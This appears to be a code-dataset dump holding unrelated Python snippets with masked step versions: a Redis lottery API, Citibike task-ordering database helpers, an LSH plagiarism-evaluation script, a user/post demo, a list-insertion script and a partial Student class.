int,luckname: str):\n \"\"\"\n 开始抽奖\n \"\"\"\n rd = RedisQueue(luckname)\n myredis = MyRedis()\n winner = luckname+\"_winner\"\n if myredis.hexists(winner,id):\n return {\n \"ret\":0,\n \"msg\":\"您已经抽过了,不能再抽了\"\n }\n award = rd.get_nowait()\n if award:\n 
myredis.hset(winner,id,award)\n myredis.hincrby(luckname,award,-1)\n \n result = {\n \"ret\":0,\n 'data':{\n \"flag\":1,\n \"msg\":\"恭喜你中奖了\",\n \"award\":award\n }\n }\n else:\n result = {\n \"ret\":0,\n 'data':{\n \"flag\":0,\n \"msg\":\"奖抽完了\",\n }\n }\n \n return result\n\n@app.get('/luckman',tags = [\"抽奖接口\"],summary=\"查看中奖名单\")\ndef luckman(luckname: str):\n myredis = MyRedis()\n winner = luckname + \"_winner\"\n winnerlist = myredis.hgetall(winner)\n print(winnerlist)\n return {\n \"ret\":0,\n \"data\":winnerlist\n }\n\n@app.get('/remaining',tags = [\"抽奖接口\"],summary=\"查看剩余奖品列表\")\ndef Remaining(luckname: str):\n myredis = MyRedis()\n remainlist = myredis.hgetall(luckname)\n print(remainlist)\n return {\n \"ret\":0,\n \"data\":remainlist\n }\n",
"step-ids": [
7,
8,
10,
11,
12
]
}
|
[
7,
8,
10,
11,
12
] |
import csv
import sqlite3
import time
from datetime import datetime, timedelta
import pandas as pd
import pytz
import json
import urllib
import numpy as np
DATABASE = '/var/www/html/citibikeapp/citibikeapp/citibike_change.db'
def execute_query(cur, query, args=()):
    """Run *query* with parameters *args* on cursor *cur*; return all rows."""
    rows = cur.execute(query, args).fetchall()
    return rows
def convertTime(et):
    """'2017-06-01 11:41:53 AM' to '2017-06-01 11:41:53' """
    hour = int(et[11:13])
    is_pm = et.find('PM') != -1
    is_am = et.find('AM') != -1
    if is_pm and hour != 12:
        # Afternoon: shift 01-11 PM to 13-23.
        return et[:10] + ' ' + str(hour + 12) + et[13:19]
    if is_am and hour == 12:
        # Midnight: 12 AM becomes hour 00.
        return et[:10] + ' ' + '00' + et[13:19]
    # Already in 24-hour form (or 12 PM / 01-11 AM): just drop the suffix.
    return et[:19]
def getNYtimenow():
    """Current wall-clock time in New York as 'YYYY-MM-DD hh:mm:ss'."""
    ny_now = datetime.now(pytz.timezone('America/New_York'))
    return str(ny_now)[:19]
def datetimeStringToObject(timeString):
    """convert a string in format YYYY-MM-DD hh:mm:ss to a datetime object

    Returns None when the string cannot be parsed.  NOTE: the result is
    truncated to minute precision (seconds are dropped), matching the
    original behavior callers may rely on.
    """
    try:
        year = int(timeString[:4])
        month = int(timeString[5:7])
        day = int(timeString[8:10])
        hour = int(timeString[11:13])
        minute = int(timeString[14:16])
        return datetime(year, month, day, hour, minute)
    # BUGFIX: narrowed from a bare ``except`` (which also swallowed
    # KeyboardInterrupt/SystemExit) to the errors int()/datetime() raise.
    except (ValueError, TypeError):
        return None
def timeStringToObject(timeString):
    """convert a string in format hh:mm:ss to a datetime object with current date

    Returns None when the string cannot be parsed; seconds and microseconds
    are zeroed, matching the original behavior.
    """
    try:
        hour = int(timeString[:2])
        minute = int(timeString[3:5])
        return datetime.today().replace(hour=hour, minute=minute, second=0,
                                        microsecond=0)
    # BUGFIX: narrowed from a bare ``except`` so unrelated bugs (and
    # KeyboardInterrupt/SystemExit) are no longer silently swallowed.
    except (ValueError, TypeError):
        return None
def notSignedIn(vID):
    """Return True if the driver has not entered a vehicle ID (sentinel '0'),
    False once a real vehicle ID has been entered."""
    return str(vID) == '0'
def resetEstComp(cur, vID):
    """Clear (NULL out) the estimated-completion time for vehicle *vID*."""
    reset_sql = """UPDATE OpenTasks SET estComplete = null WHERE vID = ? """
    cur.execute(reset_sql, [vID])
def getNextFixOrderNum(cur, vID):
    """return the integer which is one larger than the order number of the last fixed task"""
    fixed_count = execute_query(
        cur,
        """SELECT Count(*) FROM OpenTasks where vID = ? and fixTask = 1""",
        [vID],
    )[0][0]
    return int(fixed_count) + 1
def getNextOrderNum(cur, vID):
    """return the integer which is one larger than the order number of the last task"""
    task_count = execute_query(
        cur, """SELECT Count(*) FROM OpenTasks where vID = ?""", [vID]
    )[0][0]
    return int(task_count) + 1
def fixOrderBeforeInsert(cur, vID, orderNum):
    """Increment later tasks' order number by 1, orderNum is the order of the inserted task
    should be called before inserting the task """
    shift_sql = """UPDATE OpenTasks SET orderNum = orderNum + 1 WHERE vID = ? and orderNum >= ?"""
    cur.execute(shift_sql, [vID, orderNum])
normal
|
{
"blob_id": "9b8b196e1ad845ab745dabe5abe3be7bea0d5695",
"index": 4835,
"step-1": "<mask token>\n\n\ndef convertTime(et):\n \"\"\"'2017-06-01 11:41:53 AM' to '2017-06-01 11:41:53' \"\"\"\n hour = int(et[11:13])\n if et.find('PM') != -1 and hour != 12:\n dateString = et[:10]\n hour = hour + 12\n et = dateString + ' ' + str(hour) + et[13:19]\n elif et.find('AM') != -1 and hour == 12:\n dateString = et[:10]\n hour = 0\n et = dateString + ' ' + '0' + str(hour) + et[13:19]\n else:\n et = et[:19]\n return et\n\n\ndef getNYtimenow():\n tz = pytz.timezone('America/New_York')\n time = str(datetime.now(tz))[:19]\n return time\n\n\ndef datetimeStringToObject(timeString):\n \"\"\"convert a string in format YYYY-MM-DD hh:mm:ss to a datetime object\"\"\"\n try:\n year = int(timeString[:4])\n month = int(timeString[5:7])\n day = int(timeString[8:10])\n hour = int(timeString[11:13])\n minute = int(timeString[14:16])\n result = datetime(year, month, day, hour, minute)\n return result\n except:\n return None\n\n\n<mask token>\n\n\ndef resetEstComp(cur, vID):\n \"\"\"estimate completion time goes to 0\"\"\"\n cur.execute('UPDATE OpenTasks SET estComplete = null WHERE vID = ? ', [vID]\n )\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef execute_query(cur, query, args=()):\n cur = cur.execute(query, args)\n rows = cur.fetchall()\n return rows\n\n\ndef convertTime(et):\n \"\"\"'2017-06-01 11:41:53 AM' to '2017-06-01 11:41:53' \"\"\"\n hour = int(et[11:13])\n if et.find('PM') != -1 and hour != 12:\n dateString = et[:10]\n hour = hour + 12\n et = dateString + ' ' + str(hour) + et[13:19]\n elif et.find('AM') != -1 and hour == 12:\n dateString = et[:10]\n hour = 0\n et = dateString + ' ' + '0' + str(hour) + et[13:19]\n else:\n et = et[:19]\n return et\n\n\ndef getNYtimenow():\n tz = pytz.timezone('America/New_York')\n time = str(datetime.now(tz))[:19]\n return time\n\n\ndef datetimeStringToObject(timeString):\n \"\"\"convert a string in format YYYY-MM-DD hh:mm:ss to a datetime object\"\"\"\n try:\n year = int(timeString[:4])\n month = int(timeString[5:7])\n day = int(timeString[8:10])\n hour = int(timeString[11:13])\n minute = int(timeString[14:16])\n result = datetime(year, month, day, hour, minute)\n return result\n except:\n return None\n\n\n<mask token>\n\n\ndef notSignedIn(vID):\n \"\"\"Return true is the drivers did not enter vehicle ID, \n return False if the drivers have entered the vehicle ID\"\"\"\n if str(vID) == '0':\n return True\n return False\n\n\ndef resetEstComp(cur, vID):\n \"\"\"estimate completion time goes to 0\"\"\"\n cur.execute('UPDATE OpenTasks SET estComplete = null WHERE vID = ? ', [vID]\n )\n\n\ndef getNextFixOrderNum(cur, vID):\n \"\"\"return the integer which is one larger than the order number of the last fixed task\"\"\"\n orderNum = execute_query(cur,\n 'SELECT Count(*) FROM OpenTasks where vID = ? and fixTask = 1', [vID])[\n 0][0]\n orderNum = int(orderNum) + 1\n return orderNum\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef execute_query(cur, query, args=()):\n cur = cur.execute(query, args)\n rows = cur.fetchall()\n return rows\n\n\ndef convertTime(et):\n \"\"\"'2017-06-01 11:41:53 AM' to '2017-06-01 11:41:53' \"\"\"\n hour = int(et[11:13])\n if et.find('PM') != -1 and hour != 12:\n dateString = et[:10]\n hour = hour + 12\n et = dateString + ' ' + str(hour) + et[13:19]\n elif et.find('AM') != -1 and hour == 12:\n dateString = et[:10]\n hour = 0\n et = dateString + ' ' + '0' + str(hour) + et[13:19]\n else:\n et = et[:19]\n return et\n\n\ndef getNYtimenow():\n tz = pytz.timezone('America/New_York')\n time = str(datetime.now(tz))[:19]\n return time\n\n\ndef datetimeStringToObject(timeString):\n \"\"\"convert a string in format YYYY-MM-DD hh:mm:ss to a datetime object\"\"\"\n try:\n year = int(timeString[:4])\n month = int(timeString[5:7])\n day = int(timeString[8:10])\n hour = int(timeString[11:13])\n minute = int(timeString[14:16])\n result = datetime(year, month, day, hour, minute)\n return result\n except:\n return None\n\n\ndef timeStringToObject(timeString):\n \"\"\"convert a string in format hh:mm:ss to a datetime object with current date\"\"\"\n try:\n hour = int(timeString[:2])\n minute = int(timeString[3:5])\n result = datetime.today().replace(hour=hour, minute=minute, second=\n 0, microsecond=0)\n return result\n except:\n return None\n\n\ndef notSignedIn(vID):\n \"\"\"Return true is the drivers did not enter vehicle ID, \n return False if the drivers have entered the vehicle ID\"\"\"\n if str(vID) == '0':\n return True\n return False\n\n\ndef resetEstComp(cur, vID):\n \"\"\"estimate completion time goes to 0\"\"\"\n cur.execute('UPDATE OpenTasks SET estComplete = null WHERE vID = ? ', [vID]\n )\n\n\ndef getNextFixOrderNum(cur, vID):\n \"\"\"return the integer which is one larger than the order number of the last fixed task\"\"\"\n orderNum = execute_query(cur,\n 'SELECT Count(*) FROM OpenTasks where vID = ? 
and fixTask = 1', [vID])[\n 0][0]\n orderNum = int(orderNum) + 1\n return orderNum\n\n\ndef getNextOrderNum(cur, vID):\n \"\"\"return the integer which is one larger than the order number of the last task\"\"\"\n orderNum = execute_query(cur,\n 'SELECT Count(*) FROM OpenTasks where vID = ?', [vID])[0][0]\n orderNum = int(orderNum) + 1\n return orderNum\n\n\ndef fixOrderBeforeInsert(cur, vID, orderNum):\n \"\"\"Increment later tasks' order number by 1, orderNum is the order of the inserted task\n should be called before inserting the task \"\"\"\n cur.execute(\n 'UPDATE OpenTasks SET orderNum = orderNum + 1 WHERE vID = ? and orderNum >= ?'\n , [vID, orderNum])\n",
"step-4": "import csv\nimport sqlite3\nimport time\nfrom datetime import datetime, timedelta\nimport pandas as pd\nimport pytz\nimport json\nimport urllib\nimport numpy as np\nDATABASE = '/var/www/html/citibikeapp/citibikeapp/citibike_change.db'\n\n\ndef execute_query(cur, query, args=()):\n cur = cur.execute(query, args)\n rows = cur.fetchall()\n return rows\n\n\ndef convertTime(et):\n \"\"\"'2017-06-01 11:41:53 AM' to '2017-06-01 11:41:53' \"\"\"\n hour = int(et[11:13])\n if et.find('PM') != -1 and hour != 12:\n dateString = et[:10]\n hour = hour + 12\n et = dateString + ' ' + str(hour) + et[13:19]\n elif et.find('AM') != -1 and hour == 12:\n dateString = et[:10]\n hour = 0\n et = dateString + ' ' + '0' + str(hour) + et[13:19]\n else:\n et = et[:19]\n return et\n\n\ndef getNYtimenow():\n tz = pytz.timezone('America/New_York')\n time = str(datetime.now(tz))[:19]\n return time\n\n\ndef datetimeStringToObject(timeString):\n \"\"\"convert a string in format YYYY-MM-DD hh:mm:ss to a datetime object\"\"\"\n try:\n year = int(timeString[:4])\n month = int(timeString[5:7])\n day = int(timeString[8:10])\n hour = int(timeString[11:13])\n minute = int(timeString[14:16])\n result = datetime(year, month, day, hour, minute)\n return result\n except:\n return None\n\n\ndef timeStringToObject(timeString):\n \"\"\"convert a string in format hh:mm:ss to a datetime object with current date\"\"\"\n try:\n hour = int(timeString[:2])\n minute = int(timeString[3:5])\n result = datetime.today().replace(hour=hour, minute=minute, second=\n 0, microsecond=0)\n return result\n except:\n return None\n\n\ndef notSignedIn(vID):\n \"\"\"Return true is the drivers did not enter vehicle ID, \n return False if the drivers have entered the vehicle ID\"\"\"\n if str(vID) == '0':\n return True\n return False\n\n\ndef resetEstComp(cur, vID):\n \"\"\"estimate completion time goes to 0\"\"\"\n cur.execute('UPDATE OpenTasks SET estComplete = null WHERE vID = ? 
', [vID]\n )\n\n\ndef getNextFixOrderNum(cur, vID):\n \"\"\"return the integer which is one larger than the order number of the last fixed task\"\"\"\n orderNum = execute_query(cur,\n 'SELECT Count(*) FROM OpenTasks where vID = ? and fixTask = 1', [vID])[\n 0][0]\n orderNum = int(orderNum) + 1\n return orderNum\n\n\ndef getNextOrderNum(cur, vID):\n \"\"\"return the integer which is one larger than the order number of the last task\"\"\"\n orderNum = execute_query(cur,\n 'SELECT Count(*) FROM OpenTasks where vID = ?', [vID])[0][0]\n orderNum = int(orderNum) + 1\n return orderNum\n\n\ndef fixOrderBeforeInsert(cur, vID, orderNum):\n \"\"\"Increment later tasks' order number by 1, orderNum is the order of the inserted task\n should be called before inserting the task \"\"\"\n cur.execute(\n 'UPDATE OpenTasks SET orderNum = orderNum + 1 WHERE vID = ? and orderNum >= ?'\n , [vID, orderNum])\n",
"step-5": "import csv\nimport sqlite3\nimport time\nfrom datetime import datetime, timedelta\nimport pandas as pd\nimport pytz\nimport json\nimport urllib\nimport numpy as np\n\nDATABASE = '/var/www/html/citibikeapp/citibikeapp/citibike_change.db'\n\ndef execute_query(cur,query, args=()):\n cur = cur.execute(query, args)\n rows = cur.fetchall()\n # cur.close()\n return rows\n\n\ndef convertTime(et):\n \"\"\"'2017-06-01 11:41:53 AM' to '2017-06-01 11:41:53' \"\"\" \n hour = int(et[11:13])\n if et.find('PM') != -1 and hour != 12:\n dateString = et[:10]\n hour = hour + 12\n et = dateString + ' ' + str(hour) + et[13:19]\n elif et.find('AM') != -1 and hour == 12:\n dateString = et[:10]\n hour = 0\n et = dateString + ' ' + '0'+str(hour) + et[13:19]\n else:\n et = et[:19]\n\n return et\n\n\ndef getNYtimenow():\n tz = pytz.timezone('America/New_York')\n time = str(datetime.now(tz))[:19]\n return time\n\ndef datetimeStringToObject(timeString):\n \"\"\"convert a string in format YYYY-MM-DD hh:mm:ss to a datetime object\"\"\"\n try:\n year = int(timeString[:4])\n month = int(timeString[5:7])\n day = int(timeString[8:10])\n hour = int(timeString[11:13])\n minute = int(timeString[14:16])\n result = datetime(year, month, day, hour, minute)\n return result\n except:\n return None\n\ndef timeStringToObject(timeString):\n \"\"\"convert a string in format hh:mm:ss to a datetime object with current date\"\"\"\n try:\n # year = datetime.now().year\n # month = datetime.now().month\n # day = datetime.now().day\n hour = int(timeString[:2])\n minute = int(timeString[3:5])\n result = datetime.today().replace(hour=hour, minute=minute, second=0, microsecond=0)\n return result\n except:\n return None\n\ndef notSignedIn(vID):\n \"\"\"Return true is the drivers did not enter vehicle ID, \n return False if the drivers have entered the vehicle ID\"\"\"\n if str(vID) == '0':\n return True\n return False\n\n\ndef resetEstComp(cur, vID):\n \"\"\"estimate completion time goes to 0\"\"\" \n 
cur.execute(\"\"\"UPDATE OpenTasks SET estComplete = null WHERE vID = ? \"\"\",[vID])\n\ndef getNextFixOrderNum(cur,vID):\n \"\"\"return the integer which is one larger than the order number of the last fixed task\"\"\"\n orderNum = execute_query(cur, \"\"\"SELECT Count(*) FROM OpenTasks where vID = ? and fixTask = 1\"\"\", [vID])[0][0]\n orderNum = int(orderNum) + 1\n return orderNum\n\ndef getNextOrderNum(cur,vID):\n \"\"\"return the integer which is one larger than the order number of the last task\"\"\"\n orderNum = execute_query(cur,\"\"\"SELECT Count(*) FROM OpenTasks where vID = ?\"\"\", [vID])[0][0]\n orderNum = int(orderNum) + 1\n return orderNum\n\ndef fixOrderBeforeInsert(cur,vID,orderNum):\n \"\"\"Increment later tasks' order number by 1, orderNum is the order of the inserted task\n should be called before inserting the task \"\"\"\n cur.execute(\"\"\"UPDATE OpenTasks SET orderNum = orderNum + 1 WHERE vID = ? and orderNum >= ?\"\"\",[vID, orderNum])",
"step-ids": [
4,
7,
10,
12,
13
]
}
|
[
4,
7,
10,
12,
13
] |
<|reserved_special_token_0|>
def _get_stats(candidate_pairs, truth_pairs):
tp = len(candidate_pairs.intersection(truth_pairs))
prec = 1.0 * tp / len(candidate_pairs)
rec = 1.0 * tp / len(truth_pairs)
print(' returned: %d, tp=%.4f, prec=%.4f, rec=%.4f' % (len(
candidate_pairs), tp, prec, rec))
return prec, rec
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def _read_truthfile(filepath):
with open(filepath, 'r') as f:
truth_pairs = [tuple(sorted(line.strip().split())) for line in f]
return set(truth_pairs)
def _get_stats(candidate_pairs, truth_pairs):
tp = len(candidate_pairs.intersection(truth_pairs))
prec = 1.0 * tp / len(candidate_pairs)
rec = 1.0 * tp / len(truth_pairs)
print(' returned: %d, tp=%.4f, prec=%.4f, rec=%.4f' % (len(
candidate_pairs), tp, prec, rec))
return prec, rec
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def _read_truthfile(filepath):
with open(filepath, 'r') as f:
truth_pairs = [tuple(sorted(line.strip().split())) for line in f]
return set(truth_pairs)
def _get_stats(candidate_pairs, truth_pairs):
tp = len(candidate_pairs.intersection(truth_pairs))
prec = 1.0 * tp / len(candidate_pairs)
rec = 1.0 * tp / len(truth_pairs)
print(' returned: %d, tp=%.4f, prec=%.4f, rec=%.4f' % (len(
candidate_pairs), tp, prec, rec))
return prec, rec
def run(mh, truthfile, ts):
truth_pairs = _read_truthfile(truthfile)
prec_series = []
rec_series = []
for t in ts:
print('Doing LSH with t=', t)
lsh = LSH(t)
lsh.do_lsh(mh)
candidate_pairs = set(lsh.get_candidates())
prec, rec = _get_stats(candidate_pairs, truth_pairs)
prec_series.append(prec)
rec_series.append(rec)
exp_df = pd.DataFrame({'t': ts, 'prec': prec_series, 'rec': rec_series})
return exp_df
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from plagiarism_lib.article_db import ArticleDB
from plagiarism_lib.minhash import MinHash
from plagiarism_lib.lsh import LSH
import pandas as pd
import numpy as np
def _read_truthfile(filepath):
with open(filepath, 'r') as f:
truth_pairs = [tuple(sorted(line.strip().split())) for line in f]
return set(truth_pairs)
def _get_stats(candidate_pairs, truth_pairs):
tp = len(candidate_pairs.intersection(truth_pairs))
prec = 1.0 * tp / len(candidate_pairs)
rec = 1.0 * tp / len(truth_pairs)
print(' returned: %d, tp=%.4f, prec=%.4f, rec=%.4f' % (len(
candidate_pairs), tp, prec, rec))
return prec, rec
def run(mh, truthfile, ts):
truth_pairs = _read_truthfile(truthfile)
prec_series = []
rec_series = []
for t in ts:
print('Doing LSH with t=', t)
lsh = LSH(t)
lsh.do_lsh(mh)
candidate_pairs = set(lsh.get_candidates())
prec, rec = _get_stats(candidate_pairs, truth_pairs)
prec_series.append(prec)
rec_series.append(rec)
exp_df = pd.DataFrame({'t': ts, 'prec': prec_series, 'rec': rec_series})
return exp_df
<|reserved_special_token_1|>
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Oct 7 07:51:26 2017
@author: hcorrada
"""
from plagiarism_lib.article_db import ArticleDB
from plagiarism_lib.minhash import MinHash
from plagiarism_lib.lsh import LSH
import pandas as pd
import numpy as np
def _read_truthfile(filepath):
with open(filepath, 'r') as f:
truth_pairs = [tuple(sorted(line.strip().split()))
for line in f]
return set(truth_pairs)
def _get_stats(candidate_pairs, truth_pairs):
tp = len(candidate_pairs.intersection(truth_pairs))
prec = 1.0 * tp / len(candidate_pairs)
rec = 1.0 * tp / len(truth_pairs)
print (" returned: %d, tp=%.4f, prec=%.4f, rec=%.4f" % (len(candidate_pairs), tp, prec, rec))
return prec, rec
def run(mh, truthfile, ts):
    """Evaluate LSH at each threshold in *ts*.

    Args:
        mh: MinHash instance handed to each LSH pass.
        truthfile: path to the ground-truth pair file.
        ts: iterable of similarity thresholds.

    Returns:
        pandas.DataFrame with columns 't', 'prec' and 'rec'.
    """
    truth_pairs = _read_truthfile(truthfile)
    prec_series = []
    rec_series = []
    for t in ts:
        print("Doing LSH with t=", t)
        lsh = LSH(t)
        lsh.do_lsh(mh)
        candidate_pairs = set(lsh.get_candidates())
        prec, rec = _get_stats(candidate_pairs, truth_pairs)
        prec_series.append(prec)
        rec_series.append(rec)
    exp_df = pd.DataFrame({'t': ts, 'prec': prec_series, 'rec': rec_series})
    return exp_df
|
flexible
|
{
"blob_id": "18b73a06c80272aff5c0e4b10473e95bd58466f3",
"index": 1197,
"step-1": "<mask token>\n\n\ndef _get_stats(candidate_pairs, truth_pairs):\n tp = len(candidate_pairs.intersection(truth_pairs))\n prec = 1.0 * tp / len(candidate_pairs)\n rec = 1.0 * tp / len(truth_pairs)\n print(' returned: %d, tp=%.4f, prec=%.4f, rec=%.4f' % (len(\n candidate_pairs), tp, prec, rec))\n return prec, rec\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef _read_truthfile(filepath):\n with open(filepath, 'r') as f:\n truth_pairs = [tuple(sorted(line.strip().split())) for line in f]\n return set(truth_pairs)\n\n\ndef _get_stats(candidate_pairs, truth_pairs):\n tp = len(candidate_pairs.intersection(truth_pairs))\n prec = 1.0 * tp / len(candidate_pairs)\n rec = 1.0 * tp / len(truth_pairs)\n print(' returned: %d, tp=%.4f, prec=%.4f, rec=%.4f' % (len(\n candidate_pairs), tp, prec, rec))\n return prec, rec\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef _read_truthfile(filepath):\n with open(filepath, 'r') as f:\n truth_pairs = [tuple(sorted(line.strip().split())) for line in f]\n return set(truth_pairs)\n\n\ndef _get_stats(candidate_pairs, truth_pairs):\n tp = len(candidate_pairs.intersection(truth_pairs))\n prec = 1.0 * tp / len(candidate_pairs)\n rec = 1.0 * tp / len(truth_pairs)\n print(' returned: %d, tp=%.4f, prec=%.4f, rec=%.4f' % (len(\n candidate_pairs), tp, prec, rec))\n return prec, rec\n\n\ndef run(mh, truthfile, ts):\n truth_pairs = _read_truthfile(truthfile)\n prec_series = []\n rec_series = []\n for t in ts:\n print('Doing LSH with t=', t)\n lsh = LSH(t)\n lsh.do_lsh(mh)\n candidate_pairs = set(lsh.get_candidates())\n prec, rec = _get_stats(candidate_pairs, truth_pairs)\n prec_series.append(prec)\n rec_series.append(rec)\n exp_df = pd.DataFrame({'t': ts, 'prec': prec_series, 'rec': rec_series})\n return exp_df\n",
"step-4": "<mask token>\nfrom plagiarism_lib.article_db import ArticleDB\nfrom plagiarism_lib.minhash import MinHash\nfrom plagiarism_lib.lsh import LSH\nimport pandas as pd\nimport numpy as np\n\n\ndef _read_truthfile(filepath):\n with open(filepath, 'r') as f:\n truth_pairs = [tuple(sorted(line.strip().split())) for line in f]\n return set(truth_pairs)\n\n\ndef _get_stats(candidate_pairs, truth_pairs):\n tp = len(candidate_pairs.intersection(truth_pairs))\n prec = 1.0 * tp / len(candidate_pairs)\n rec = 1.0 * tp / len(truth_pairs)\n print(' returned: %d, tp=%.4f, prec=%.4f, rec=%.4f' % (len(\n candidate_pairs), tp, prec, rec))\n return prec, rec\n\n\ndef run(mh, truthfile, ts):\n truth_pairs = _read_truthfile(truthfile)\n prec_series = []\n rec_series = []\n for t in ts:\n print('Doing LSH with t=', t)\n lsh = LSH(t)\n lsh.do_lsh(mh)\n candidate_pairs = set(lsh.get_candidates())\n prec, rec = _get_stats(candidate_pairs, truth_pairs)\n prec_series.append(prec)\n rec_series.append(rec)\n exp_df = pd.DataFrame({'t': ts, 'prec': prec_series, 'rec': rec_series})\n return exp_df\n",
"step-5": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 7 07:51:26 2017\n\n@author: hcorrada\n\"\"\"\n\nfrom plagiarism_lib.article_db import ArticleDB\nfrom plagiarism_lib.minhash import MinHash\nfrom plagiarism_lib.lsh import LSH\n\nimport pandas as pd\nimport numpy as np\n\ndef _read_truthfile(filepath):\n with open(filepath, 'r') as f:\n truth_pairs = [tuple(sorted(line.strip().split()))\n for line in f]\n return set(truth_pairs)\n\ndef _get_stats(candidate_pairs, truth_pairs):\n tp = len(candidate_pairs.intersection(truth_pairs)) \n prec = 1.0 * tp / len(candidate_pairs)\n rec = 1.0 * tp / len(truth_pairs)\n print (\" returned: %d, tp=%.4f, prec=%.4f, rec=%.4f\" % (len(candidate_pairs), tp, prec, rec))\n return prec, rec\n\ndef run(mh, truthfile, ts):\n truth_pairs = _read_truthfile(truthfile)\n \n prec_series = []\n rec_series = []\n \n for t in ts:\n print(\"Doing LSH with t=\", t) \n lsh = LSH(t)\n lsh.do_lsh(mh)\n \n candidate_pairs = set(lsh.get_candidates())\n prec, rec = _get_stats(candidate_pairs, truth_pairs) \n prec_series.append(prec)\n rec_series.append(rec)\n \n exp_df = pd.DataFrame({'t': ts, 'prec': prec_series, 'rec': rec_series})\n \n return exp_df",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
app_user_one.get_user_info()
app_user_one.change_status('in job market')
app_user_one.get_user_info()
<|reserved_special_token_0|>
app_user_two.get_user_info()
<|reserved_special_token_0|>
new_post.get_post_info()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
app_user_one = user.User('rr@gg.com', 'Riks R', 'ppp1', 'student')
app_user_one.get_user_info()
app_user_one.change_status('in job market')
app_user_one.get_user_info()
app_user_two = user.User('z43@gg.com', 'Bobby L', 'zz1', 'student')
app_user_two.get_user_info()
new_post = Post('Going for it', app_user_two.name)
new_post.get_post_info()
<|reserved_special_token_1|>
# Demo script exercising the project-local `user` and `post` modules.
import user
from post import Post
# Create a user, print its info, change its status, and print again.
app_user_one = user.User('rr@gg.com', 'Riks R', 'ppp1', 'student')
app_user_one.get_user_info()
app_user_one.change_status('in job market')
app_user_one.get_user_info()
# A second user, used as the author of the post below.
app_user_two = user.User('z43@gg.com', 'Bobby L', 'zz1', 'student')
app_user_two.get_user_info()
# Create a post authored by the second user and print its details.
new_post = Post('Going for it', app_user_two.name)
new_post.get_post_info()
<|reserved_special_token_1|>
# Demo script exercising the project-local `user` and `post` modules.
import user
# Alternative: `from user import User` would allow calling `User(...)` directly.
from post import Post
# Create a user, print its info, change its status, and print again.
app_user_one = user.User("rr@gg.com", "Riks R", "ppp1", "student")
app_user_one.get_user_info()
app_user_one.change_status("in job market")
app_user_one.get_user_info()
# A second user, used as the author of the post below.
app_user_two = user.User("z43@gg.com", "Bobby L", "zz1", "student")
app_user_two.get_user_info()
# Create a post authored by the second user and print its details.
new_post = Post("Going for it", app_user_two.name)
new_post.get_post_info()
|
flexible
|
{
"blob_id": "f59db28b669a41051cc6d0d4b8e14d1c7b0edd11",
"index": 2555,
"step-1": "<mask token>\n",
"step-2": "<mask token>\napp_user_one.get_user_info()\napp_user_one.change_status('in job market')\napp_user_one.get_user_info()\n<mask token>\napp_user_two.get_user_info()\n<mask token>\nnew_post.get_post_info()\n",
"step-3": "<mask token>\napp_user_one = user.User('rr@gg.com', 'Riks R', 'ppp1', 'student')\napp_user_one.get_user_info()\napp_user_one.change_status('in job market')\napp_user_one.get_user_info()\napp_user_two = user.User('z43@gg.com', 'Bobby L', 'zz1', 'student')\napp_user_two.get_user_info()\nnew_post = Post('Going for it', app_user_two.name)\nnew_post.get_post_info()\n",
"step-4": "import user\nfrom post import Post\napp_user_one = user.User('rr@gg.com', 'Riks R', 'ppp1', 'student')\napp_user_one.get_user_info()\napp_user_one.change_status('in job market')\napp_user_one.get_user_info()\napp_user_two = user.User('z43@gg.com', 'Bobby L', 'zz1', 'student')\napp_user_two.get_user_info()\nnew_post = Post('Going for it', app_user_two.name)\nnew_post.get_post_info()\n",
"step-5": "import user\n\n# or from user import User\nfrom post import Post\napp_user_one = user.User(\"rr@gg.com\", \"Riks R\", \"ppp1\", \"student\")\napp_user_one.get_user_info()\napp_user_one.change_status(\"in job market\")\napp_user_one.get_user_info()\n\n\napp_user_two = user.User(\"z43@gg.com\", \"Bobby L\", \"zz1\", \"student\")\napp_user_two.get_user_info()\n\nnew_post = Post(\"Going for it\", app_user_two.name)\nnew_post.get_post_info()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Insert a user-supplied number into a descending-sorted list while
# keeping the descending order intact.
my_list = [9, 9, 9, 8, 8, 7, 7, 6, 6, 5, 4, 4, 4, 2, 2, 1]
new_num = int(input('Enter a new number - '))
# Insertion index = how many existing elements are >= the new number.
insert_at = sum(1 for n in my_list if new_num <= n)
my_list.insert(insert_at, float(new_num))
print(my_list)
|
normal
|
{
"blob_id": "be16e13c0e03952e45f98b175975795bba19cf9a",
"index": 2775,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor n in my_list:\n if new_num <= n:\n i += 1\nmy_list.insert(i, float(new_num))\nprint(my_list)\n",
"step-3": "my_list = [9, 9, 9, 8, 8, 7, 7, 6, 6, 5, 4, 4, 4, 2, 2, 1]\nnew_num = int(input('Enter a new number - '))\ni = 0\nfor n in my_list:\n if new_num <= n:\n i += 1\nmy_list.insert(i, float(new_num))\nprint(my_list)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
class Student(object):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def full_name(self):
return '{} {}'.format(self._first_name, self._last_name)
def detail_info(self):
return 'Student Detail Info : {},{},{},{},{},{}'.format(self._id,
self.full_name(), self._email, self._grade, self._tuition, self
._gpa)
<|reserved_special_token_0|>
def get_fee_culc(self):
return 'After tuition -> Id: {}, fee: {}'.format(self._id, self.
_tuition * Student.tuition_per)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
@classmethod
def student_const(cls, id, first_name, last_name, email, grade, tuition,
gpa):
return cls(id, first_name, last_name, email, grade, tuition * cls.
tuition_per, gpa)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Student(object):
<|reserved_special_token_0|>
